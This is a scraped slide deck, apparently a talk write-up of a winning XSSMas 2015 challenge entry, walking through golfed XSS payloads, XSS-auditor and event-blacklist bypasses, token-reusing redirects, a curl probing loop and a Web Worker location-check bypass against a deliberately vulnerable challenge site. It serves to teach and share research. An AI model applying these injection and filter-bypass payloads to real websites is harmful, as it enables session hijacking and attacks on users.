Uploaded bycgvwzq
PDF, PPTX4,022 views

A XSSmas carol

The document discusses a security challenge focused on exploiting XSS (Cross-Site Scripting) vulnerabilities across several PHP files (index.php, token.php, index2.php, index3.php). It details the author's approach, strategies, and outcomes while attempting to bypass anti-XSS measures and generate successful payloads for the challenge. Additionally, it includes snippets of code and ideas for effective exploitation techniques, emphasizing trial and error in the learning process.

Embed presentation

Download as PDF, PPTX
A XSSmas carol by pepe vila
whoami Name: Pepe Vila (@cgvwzq) Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
whoami Name: Pepe Vila (@cgvwzq) == btoa("pepe").toLowerCase().replace(/[=+]/g,'') Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element the challenge
the challenge shortcut! Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element
what we know? Hints probably don’t help too much a priori. But after many some test & error we can learn: - Browser anti-XSS (on IE, Chrome and Opera) - token == sessionid => same token used everywhere - index3.php checks token and Referer header - requests to index.php and index3.php regenerate the sessionid - we don’t need to include the .php extension - paths after a valid resource are ignored on server side (e.g.: http://domain/index/foobar/ == http://domain/index.php )
what we know? - index.php reflects $_GET[‘xss’] in <div class=’<INJECTION>’>·–·</div> … <script src="token.php?token= <TOKEN>&callback=document.write" ></script> use htmlentities, but we can escape the attribute context with single quotes - fortunately the <script> string is stripped, so we can bypass anti-XSS filters
what we know? - index3.php checks Referer header (for the string “/index2.php”) and the token - if ok reflects $_GET[‘xss’] in <p class='<INJECTION>'></p> again with htmlentities, so we escape attribute context - no stripping this time, but some blacklisted events are replaced by “onend” - a CSS comment tell us to “get some ‘css’?” so we can inject also in <style> context
what we know? - index3.php checks Referer header for the string “/index2.php” and for a valid token - if ok reflects $_GET[‘xss’] in <p class='<INJECTION>'></p> again with htmlentities, so we escape attribute context - no stripping this time, but some blacklisted events are replaced by “onend” - a CSS comment tell us to “get some ‘css’?” so we can inject also in <style> context
ideas <div contenteditable id=x onfocus=alert(1)></div> + target (all but FF) vs. <div onbeforescriptexecute=alert(1)><script></script></div> (only FF) Firefox has no anti-XSS, but I couldn’t get execution on /index3.php :( And… onanimationstop is translated into onanimationend which is a valid event :) and because the replace XSS Auditor does not match :D
ideas I also wrote a bash script to list all non-replaced events: #!/bin/bash TOKEN="$1" for i in $(cat events.txt); do curl -s -H "Cookie: PHPSESSID=${TOKEN}" -H "Referer: http://any/index2.php" "https://xssmas2015.cure53.co.uk/index3?token=${TOKEN}&xss='${i}=alert(1)" | grep '<p class' | grep -v "'onend" done What gave me some events to JSfiddle with: onafterscriptexecute,onariarequest,onautocomplete,onautocompleteerror,onbeforescriptexecute,onbeforeupdate,oncancel,onclose, oncommand,oncompassneedscalibration,oncuechange,ondevicelight,ondevicemotion,ondeviceorientation,ondeviceproximity,ondurationend, onfullscreenchange,onfullscreenerror,ongotpointercapture,onhashchange,oninput,onlanguagechange,onlostpointercapture, onmozfullscreenchange,onmozfullscreenerror,onmozpointerlockchange,onmozpointerlockerror,onmscontentzoom,onmsfullscreenchange, onmsfullscreenerror,onmsgesturechange,onmsgesturedoubletap,onmsgestureend,onmsgesturehold,onmsgesturestart,onmsgesturetap, onmsgotpointercapture,onmsinertiastart,onmslostpointercapture,onmsmanipulationstatechanged,onmspointercancel,onmspointerdown, onmspointerenter,onmspointerleave,onmspointermove,onmspointerout,onmspointerover,onmspointerup,onmssitemodejumplistitemremoved, onmsthumbnailclick,onpage,onpointercancel,onpointerdown,onpointerenter,onpointerleave,onpointerlockchange,onpointerlockerror, onpointermove,onpointerout,onpointerover,onpointerup,onpopstate,onratechange,onrowsdelete,onrowsinserted,onshow,ontoggle, onuserproximity,onwebkitfullscreenchange,onwebkitfullscreenerror, onwebkittransitionend* ,onwheel
my first solution ?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. (cookie is also HTTP only)
my first solution ?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. IDEA -> TEST & ERROR + REMEASURE 189
warm up... ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3${all[56].src.slice(41)}% 26css=*{animation:x}@keyframes+x{%26xss=%2527onanimationstop=alert(URL)//index2. php`#x With some improvements… + tabindex=1 also makes elements focusable + we can reuse the ?token= part from all[xx].src + slice (5) vs. substr (6) + General animation CSS property instead of animation-name + Move style attribute inside the CSS context *{animation:x} (14) vs. style=animation:x+ (18) + URL with document in scope makes document.URL :) 161 But the rest of the guys still ahead with ~150 bytes :(
warm up x 2 ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3/${all[56].src}%26css=* {animation:x}@keyframes+x{%26xss=%2527onanimationcut=alert(URL)//index2.php `#x An a couple more + No need to slice the token’s URL if we set it as path (same resource requested): /index3/http://xssmas2015.cure53.co.uk/token.php?token=<TOKEN>&callback=document.write equal to /index3?token=<TOKEN>&callback=document.write + Shortest replaced event is oncut, so onanimationoncut will become onanimationend :) * I actually bruteforced all possible 2 char combinations, just in case… -_-’ 151
that was me
reorder you must ?xss=’id=x+onfocus<script>= location=`index3/index2.php${all[56].src}%26css=* {animation:x}@keyframesfx{%26xss=’onanimationcut=’alert(URL) `+tabindex=1#x + onfocus attribute doesn’t need quotes if we don’t break it with spaces BONUS: we can avoid the double URL encoding for the single quote :D + instead of URL encoding the space on the keyframe we can do better with f + moving /index2.php saves us 1 slash (we change the other one for an opening single quote) + tabindex=1’foobartrashhere is the only attribute that still works without an opening single quote 146
JSFiddle results I created an HTML element with ~200 events [1] and played with different attribute combinations and styles. MDN, MSDN and similars are also very helpful. I had previously found ontransitionend, but I just ignored it since it was longer than my current solution, so I even did a tweet of it -_-’ However… At some point the ontransitionend event got fired without setting any CSS property WHY? :S [1] http://pastebin.com/raw/WwcBmz5J
JSFiddle results Focusable elements “grow” and outline-width when focused. So… transition:1s will trigger a transition when we focus any focusable element. And we already know how to do that. + We are reusing the style, id and tabindex properties as well as the location.hash !! + Next steps? 145 ?xss=’onfocus<script>= location=`index3/index2.php${all[56].src}%26xss=’ onwebkittransitioncut=alert(URL)// ${URL}`+style=transition:1s+id=x+tabindex=1#x
‘onf$ck=’#asd!$@41 I got out of ideas many times. Different solutions but all the same length, dead paths, more dead paths… I was trying to reuse more parts of the first injection (tried with replace, slice and concatenation) but I couldn’t save too much :(
never gonna give you up
2paths1injection New idea and wrote Mario asking if getting an alert(URL) in both injection was valid, and he said YES. So I basically broke the Twitter barrier :) Using the same payload in both injections: + Note the extra “&” in order to concat the “xss” parameter + We need to put “oncut” at some place to cheat the anti-XSS. + The 0<script>1 will be syntactically correct but on the second page will throw an “not defined” exception. + XSS Auditor allows the stripped/replaced string to be in any place before “/” or “,” ?&xss=’style=transition:1s+id=x+tabindex=1+onwebkittransitionend=oncut=alert(URL) ||0<script>1,location=`index3/index2.php${all[56].src}${URL}`#x 139
2paths1injection And saved some more bytes.... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: 0<script>1,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x 137
2paths1injection And a few more... This one worth the creativity special prize :D ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
2paths1injection And a few more... This one worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
2paths1injection And a few more... This one worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... BACK TO 145 :( ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 145
my first shortest solution Fortunately I was pretty sure that the idea could work, and after some more time in front of vim I got this: 141 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=`<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x What in index.php was: ?&xss='style=transition:1s+id=x+onwebkittransitionend= oncut=``-alert(URL)//` , location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x And in index3.php: ?&xss='style=transition:1s+id=x+onwebkittransitionend=onend= `<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x ONLY ONE ALERT
a little shorter 137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D
a little shorter 137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D This was on January 12th, and I could rest until @molnar_g did 136 a week (a very long one indeed) before the end of contest.
JS strings 101 135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: The winner vector
JS strings 101 135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: ?&xss=/index2.php'style=transition: 1s+id=x+onwebkittransitionend=oncut=`<script>`?alert(URL):location=[/index3/,all [58].src,URL]+tabindex=1#x ?&xss=/index2.php'style=transition:1s+id=x+onwebkittransitionend=location=oncut= [`<script>`?alert(URL):/index3/,all[58].src,URL]+tabindex=1#x
Jontransition & Co. A couple of days before the end of the contest this mysterious “guy” appeared in the scoreboard… ~.~ and @phiber told me that I was going to be defeated, driving me crazy. So I started thinking again trying to split, slice, replace the innerHTML in order to save 1 byte more by reusing the “transition” string from “Jontransition”. But I couldn’t improve the vector on that way, so I tried again some other paths...
more ideas ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=location= [`<script>index3/index2.php`, (all[60]||alert(URL)).src,URL]+tabindex=1#x Alternative 135 solution. ?&xss='style=transition:1s+id=x+onwebkittransitionend= x.oncut-1?location= [`<script>index3/index2.php`,all[60].src,URL] :alert(URL)+tabindex=1#x I thought this idea could save me a couple of bytes, but at the end I couldn’t :( Anyway it is interesting (136): + oncut == null vs. onend == undefined + +null == 0 vs. +undefined == NaN ... oncut-1 == -1 == true vs. undefined-1 == NaN == false
the end At the end Jontransition didn’t make it (or did he? ~.^), and after several days of having fun, learning and suffering I was lucky enough to win :) I hope not having bored you too much, and that you have find at least something interesting... Congrats to the rest of the winners :) Also thanks to Mario, @mmrupp and @filedescriptor for organizing these contests and sharing their knowledge.
questions?
bonus token.php + Server-side checks for the Referer (not empty & different than “xssmas2015.cure53.co.uk”) and for a valid token. + Client-side check: if (document.location.href == document.location.protocol + '//localhost' + location.pathname) callback({foo:”thesecret”}) Web Worker’s context allows to set the document and location properties and importScripts the file. document={location:{href:’//localhost’,protocol:’’}};location={pathname:’’};importScripts(‘https://xssmas2015. cure53.co.uk/token.php?token=<TOKEN>&callback=postMessage So that should bypass the client-side check and get the token for index2.php, but... + Chrome does not send Referer on Web Worker’s requests from Blob URLs (we need an external file). + Chrome neither sends cookies on cross-domain requests from a Web Worker (B req. A), unless the page B which created the Web Worker is loaded in a page-A’s iframe (dafuq :S is this in the spec?)

More Related Content

PDF
The innerHTML Apocalypse
byMario Heiderich
 
PDF
Locking the Throneroom 2.0
byMario Heiderich
 
PDF
Scriptless Attacks - Stealing the Pie without touching the Sill
byMario Heiderich
 
PDF
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
byMario Heiderich
 
PDF
The Image that called me - Active Content Injection with SVG Files
byMario Heiderich
 
PDF
In the DOM, no one will hear you scream
byMario Heiderich
 
PDF
The Ultimate IDS Smackdown
byMario Heiderich
 
PDF
The Future of Web Attacks - CONFidence 2010
byMario Heiderich
 
The innerHTML Apocalypse
byMario Heiderich
 
Locking the Throneroom 2.0
byMario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
byMario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
byMario Heiderich
 
The Image that called me - Active Content Injection with SVG Files
byMario Heiderich
 
In the DOM, no one will hear you scream
byMario Heiderich
 
The Ultimate IDS Smackdown
byMario Heiderich
 
The Future of Web Attacks - CONFidence 2010
byMario Heiderich
 

What's hot

PDF
I thought you were my friend - Malicious Markup
byMario Heiderich
 
PDF
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
PDF
Mario heiderich. got your nose! how to steal your precious data without using...
byYury Chemerkin
 
PDF
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
byMario Heiderich
 
PDF
New Methods in Automated XSS Detection & Dynamic Exploit Creation
byKen Belva
 
PDF
An Abusive Relationship with AngularJS
byMario Heiderich
 
PPTX
XSS - Do you know EVERYTHING?
byYurii Bilyk
 
PDF
Polyglot payloads in practice by avlidienbrunn at HackPra
byMathias Karlsson
 
PDF
Dev and Blind - Attacking the weakest Link in IT Security
byMario Heiderich
 
PDF
Clean Code
byISchwarz23
 
PDF
JavaScript From Hell - CONFidence 2.0 2009
byMario Heiderich
 
PDF
Generic Attack Detection - ph-Neutral 0x7d8
byMario Heiderich
 
PPT
JavaScript Basics with baby steps
byMuhammad khurram khan
 
PDF
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
byMMT - Multimediatreff
 
PDF
Breaking AngularJS Javascript sandbox
byMathias Karlsson
 
PDF
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
byMario Heiderich
 
PDF
Defcon 20-zulla-improving-web-vulnerability-scanning
byzulla
 
PDF
Cryptography in PHP: use cases
byEnrico Zimuel
 
ODP
Security and why you need to review yours.
byDavid Busby, CISSP
 
PDF
HTML5 - The Good, the Bad, the Ugly
byMario Heiderich
 
I thought you were my friend - Malicious Markup
byMario Heiderich
 
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
Mario heiderich. got your nose! how to steal your precious data without using...
byYury Chemerkin
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
byMario Heiderich
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
byKen Belva
 
An Abusive Relationship with AngularJS
byMario Heiderich
 
XSS - Do you know EVERYTHING?
byYurii Bilyk
 
Polyglot payloads in practice by avlidienbrunn at HackPra
byMathias Karlsson
 
Dev and Blind - Attacking the weakest Link in IT Security
byMario Heiderich
 
Clean Code
byISchwarz23
 
JavaScript From Hell - CONFidence 2.0 2009
byMario Heiderich
 
Generic Attack Detection - ph-Neutral 0x7d8
byMario Heiderich
 
JavaScript Basics with baby steps
byMuhammad khurram khan
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
byMMT - Multimediatreff
 
Breaking AngularJS Javascript sandbox
byMathias Karlsson
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
byMario Heiderich
 
Defcon 20-zulla-improving-web-vulnerability-scanning
byzulla
 
Cryptography in PHP: use cases
byEnrico Zimuel
 
Security and why you need to review yours.
byDavid Busby, CISSP
 
HTML5 - The Good, the Bad, the Ugly
byMario Heiderich
 

Similar to A XSSmas carol

PPTX
Lec4-WebClientSideExploitation.pptxdslkjhgfkjdshgfkjfhdkjg
byarfaouisalim
 
ODP
XSS
byHrishikesh Mishra
 
PDF
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
bySam Bowne
 
PPT
XSS Primer - Noob to Pro in 1 hour
bysnoopythesecuritydog
 
PDF
Session7-XSS & CSRF
byzakieh alizadeh
 
PDF
CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)
byPROIDEA
 
PPTX
A Forgotten HTTP Invisibility Cloak
bySoroush Dalili
 
PDF
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
byGiorgiRcheulishvili
 
PDF
XSS Defeating Trick ~=ABK=~ WhitePaper
byAbhishek Kumar
 
KEY
Application Security for RIAs
byjohnwilander
 
KEY
Application Security for Rich Internet Applicationss (Jfokus 2012)
byjohnwilander
 
PDF
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
byMoscowJS
 
PPT
Same Origin Policy Weaknesses
bykuza55
 
PDF
mjs
byIvan Elkin
 
PPTX
Beyond xss
byJudy Ngure
 
PPTX
Application Context and Discovering XSS without
byTodd Benson (I.T. SPECIALIST and I.T. SECURITY)
 
PDF
The Ring programming language version 1.5.3 book - Part 55 of 184
byMahmoud Samir Fayed
 
PDF
The Ring programming language version 1.5.3 book - Part 45 of 184
byMahmoud Samir Fayed
 
PDF
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
bySam Bowne
 
PPTX
Integrated security testing public
byMorgan Roman
 
Lec4-WebClientSideExploitation.pptxdslkjhgfkjdshgfkjfhdkjg
byarfaouisalim
 
XSS
byHrishikesh Mishra
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
bySam Bowne
 
XSS Primer - Noob to Pro in 1 hour
bysnoopythesecuritydog
 
Session7-XSS & CSRF
byzakieh alizadeh
 
CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)
byPROIDEA
 
A Forgotten HTTP Invisibility Cloak
bySoroush Dalili
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
byGiorgiRcheulishvili
 
XSS Defeating Trick ~=ABK=~ WhitePaper
byAbhishek Kumar
 
Application Security for RIAs
byjohnwilander
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
byjohnwilander
 
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
byMoscowJS
 
Same Origin Policy Weaknesses
bykuza55
 
mjs
byIvan Elkin
 
Beyond xss
byJudy Ngure
 
Application Context and Discovering XSS without
byTodd Benson (I.T. SPECIALIST and I.T. SECURITY)
 
The Ring programming language version 1.5.3 book - Part 55 of 184
byMahmoud Samir Fayed
 
The Ring programming language version 1.5.3 book - Part 45 of 184
byMahmoud Samir Fayed
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
bySam Bowne
 
Integrated security testing public
byMorgan Roman
 

Recently uploaded

PPTX
Instrumentation.Instrumentation.Instrumentation.pptx
byDavid Kurtz
 
PDF
Princeton RSE: Python Histograms as objects
byHenry Schreiner
 
PDF
How Fireworks AI Achieves 1TB_s+ Throughput for Model Deployment Across Multi...
byAlluxio, Inc.
 
PDF
Princeton RSE: What's new in Python π (3.14)
byHenry Schreiner
 
PDF
Hack&Verse Kick-off and infor session Event ppt
bysanidhyasahu1120
 
PPTX
Performance Engineering: New and Conflicting Trends
byAlexander Podelko
 
PDF
Princeton 2026: Tools That Help You
 Write Better Code
byHenry Schreiner
 
PDF
Salesforce Data Migration Services.pdf
byRobert Mark
 
PDF
Cloud Automotive Software: Cost, Speed & Scalability
byShiv Technolabs Pvt. Ltd.
 
PDF
Enterprise Software’s Role in Data-Driven Decisions
byShiv Technolabs Pvt. Ltd.
 
PDF
our environment ppt made by many people name rarang yadav
byrarang180
 
PPTX
Business Central and Copilot pitch deck ppt
byjonbravetti
 
PPTX
Architectural Styles in Software Engineering
byM Munim
 
PPTX
Feasibility Analysis in System Development Using Data Flow Diagrams
byM Munim
 
PDF
Incident Management Roles & Responsibilities.pdf
byTaskCall
 
PPTX
Project System Presentation details process presentation
bytejpratappandey4
 
PPTX
Free AI Paraphrasing Tool to Rewrite Sentences – SENTENCIFY
bySENTENCIFY
 
PDF
Problem Solving_20241203_220045_0000.pdf
bythakurayush00991
 
PPTX
NetworkMediaWireless (1).pptxunsnsndjdjdjjdnd
byre7022
 
PPTX
ONLINE TRAVEL BUSINESS SOFTWARE | BUSINESS TRAVEL SOFTWARE
byphilipnathen82
 
Instrumentation.Instrumentation.Instrumentation.pptx
byDavid Kurtz
 
Princeton RSE: Python Histograms as objects
byHenry Schreiner
 
How Fireworks AI Achieves 1TB_s+ Throughput for Model Deployment Across Multi...
byAlluxio, Inc.
 
Princeton RSE: What's new in Python π (3.14)
byHenry Schreiner
 
Hack&Verse Kick-off and infor session Event ppt
bysanidhyasahu1120
 
Performance Engineering: New and Conflicting Trends
byAlexander Podelko
 
Princeton 2026: Tools That Help You
 Write Better Code
byHenry Schreiner
 
Salesforce Data Migration Services.pdf
byRobert Mark
 
Cloud Automotive Software: Cost, Speed & Scalability
byShiv Technolabs Pvt. Ltd.
 
Enterprise Software’s Role in Data-Driven Decisions
byShiv Technolabs Pvt. Ltd.
 
our environment ppt made by many people name rarang yadav
byrarang180
 
Business Central and Copilot pitch deck ppt
byjonbravetti
 
Architectural Styles in Software Engineering
byM Munim
 
Feasibility Analysis in System Development Using Data Flow Diagrams
byM Munim
 
Incident Management Roles & Responsibilities.pdf
byTaskCall
 
Project System Presentation details process presentation
bytejpratappandey4
 
Free AI Paraphrasing Tool to Rewrite Sentences – SENTENCIFY
bySENTENCIFY
 
Problem Solving_20241203_220045_0000.pdf
bythakurayush00991
 
NetworkMediaWireless (1).pptxunsnsndjdjdjjdnd
byre7022
 
ONLINE TRAVEL BUSINESS SOFTWARE | BUSINESS TRAVEL SOFTWARE
byphilipnathen82
 

A XSSmas carol

  • 1.
    A XSSmas carolby pepe vila
  • 2.
    whoami Name: Pepe Vila(@cgvwzq) Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
  • 3.
    whoami Name: Pepe Vila(@cgvwzq) == btoa("pepe").toLowerCase().replace(/[=+]/g,'') Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
  • 4.
    Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php:xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element the challenge
  • 5.
    the challenge shortcut! Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ●index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element
  • 6.
    what we know? Hintsprobably don’t help too much a priori. But after many some test & error we can learn: - Browser anti-XSS (on IE, Chrome and Opera) - token == sessionid => same token used everywhere - index3.php checks token and Referer header - requests to index.php and index3.php regenerate the sessionid - we don’t need to include the .php extension - paths after a valid resource are ignored on server side (e.g.: http://domain/index/foobar/ == http://domain/index.php )
  • 7.
    what we know? -index.php reflects $_GET[‘xss’] in <div class=’<INJECTION>’>·–·</div> … <script src="token.php?token= <TOKEN>&callback=document.write" ></script> use htmlentities, but we can escape the attribute context with single quotes - fortunately the <script> string is stripped, so we can bypass anti-XSS filters
  • 8.
    what we know? -index3.php checks Referer header (for the string “/index2.php”) and the token - if ok reflects $_GET[‘xss’] in <p class='<INJECTION>'></p> again with htmlentities, so we escape attribute context - no stripping this time, but some blacklisted events are replaced by “onend” - a CSS comment tell us to “get some ‘css’?” so we can inject also in <style> context
  • 9.
    what we know? -index3.php checks Referer header for the string “/index2.php” and for a valid token - if ok reflects $_GET[‘xss’] in <p class='<INJECTION>'></p> again with htmlentities, so we escape attribute context - no stripping this time, but some blacklisted events are replaced by “onend” - a CSS comment tell us to “get some ‘css’?” so we can inject also in <style> context
  • 10.
    ideas <div contenteditable id=xonfocus=alert(1)></div> + target (all but FF) vs. <div onbeforescriptexecute=alert(1)><script></script></div> (only FF) Firefox has no anti-XSS, but I couldn’t get execution on /index3.php :( And… onanimationstop is translated into onanimationend which is a valid event :) and because the replace XSS Auditor does not match :D
  • 11.
    ideas I also wrotea bash script to list all non-replaced events: #!/bin/bash TOKEN="$1" for i in $(cat events.txt); do curl -s -H "Cookie: PHPSESSID=${TOKEN}" -H "Referer: http://any/index2.php" "https://xssmas2015.cure53.co.uk/index3?token=${TOKEN}&xss='${i}=alert(1)" | grep '<p class' | grep -v "'onend" done What gave me some events to JSfiddle with: onafterscriptexecute,onariarequest,onautocomplete,onautocompleteerror,onbeforescriptexecute,onbeforeupdate,oncancel,onclose, oncommand,oncompassneedscalibration,oncuechange,ondevicelight,ondevicemotion,ondeviceorientation,ondeviceproximity,ondurationend, onfullscreenchange,onfullscreenerror,ongotpointercapture,onhashchange,oninput,onlanguagechange,onlostpointercapture, onmozfullscreenchange,onmozfullscreenerror,onmozpointerlockchange,onmozpointerlockerror,onmscontentzoom,onmsfullscreenchange, onmsfullscreenerror,onmsgesturechange,onmsgesturedoubletap,onmsgestureend,onmsgesturehold,onmsgesturestart,onmsgesturetap, onmsgotpointercapture,onmsinertiastart,onmslostpointercapture,onmsmanipulationstatechanged,onmspointercancel,onmspointerdown, onmspointerenter,onmspointerleave,onmspointermove,onmspointerout,onmspointerover,onmspointerup,onmssitemodejumplistitemremoved, onmsthumbnailclick,onpage,onpointercancel,onpointerdown,onpointerenter,onpointerleave,onpointerlockchange,onpointerlockerror, onpointermove,onpointerout,onpointerover,onpointerup,onpopstate,onratechange,onrowsdelete,onrowsinserted,onshow,ontoggle, onuserproximity,onwebkitfullscreenchange,onwebkitfullscreenerror, onwebkittransitionend* ,onwheel
  • 12.
    my first solution ?xss=’contenteditable+id=x+onfocus<script>=’location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. (cookie is also HTTP only)
  • 13.
    my first solution ?xss=’contenteditable+id=x+onfocus<script>=’location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. IDEA -> TEST & ERROR + REMEASURE 189
  • 14.
    warm up... ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3${all[56].src.slice(41)}% 26css=*{animation:x}@keyframes+x{%26xss=%2527onanimationstop=alert(URL)//index2. php`#x Withsome improvements… + tabindex=1 also makes elements focusable + we can reuse the ?token= part from all[xx].src + slice (5) vs. substr (6) + General animation CSS property instead of animation-name + Move style attribute inside the CSS context *{animation:x} (14) vs. style=animation:x+ (18) + URL with document in scope makes document.URL :) 161 But the rest of the guys still ahead with ~150 bytes :(
  • 15.
    warm up x2 ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3/${all[56].src}%26css=* {animation:x}@keyframes+x{%26xss=%2527onanimationcut=alert(URL)//index2.php `#x An a couple more + No need to slice the token’s URL if we set it as path (same resource requested): /index3/http://xssmas2015.cure53.co.uk/token.php?token=<TOKEN>&callback=document.write equal to /index3?token=<TOKEN>&callback=document.write + Shortest replaced event is oncut, so onanimationoncut will become onanimationend :) * I actually bruteforced all possible 2 char combinations, just in case… -_-’ 151
  • 16.
  • 17.
    reorder you must ?xss=’id=x+onfocus<script>=location=`index3/index2.php${all[56].src}%26css=* {animation:x}@keyframesfx{%26xss=’onanimationcut=’alert(URL) `+tabindex=1#x + onfocus attribute doesn’t need quotes if we don’t break it with spaces BONUS: we can avoid the double URL encoding for the single quote :D + instead of URL encoding the space on the keyframe we can do better with f + moving /index2.php saves us 1 slash (we change the other one for an opening single quote) + tabindex=1’foobartrashhere is the only attribute that still works without an opening single quote 146
  • 18.
    JSFiddle results I createdan HTML element with ~200 events [1] and played with different attribute combinations and styles. MDN, MSDN and similars are also very helpful. I had previously found ontransitionend, but I just ignored it since it was longer than my current solution, so I even did a tweet of it -_-’ However… At some point the ontransitionend event got fired without setting any CSS property WHY? :S [1] http://pastebin.com/raw/WwcBmz5J
  • 19.
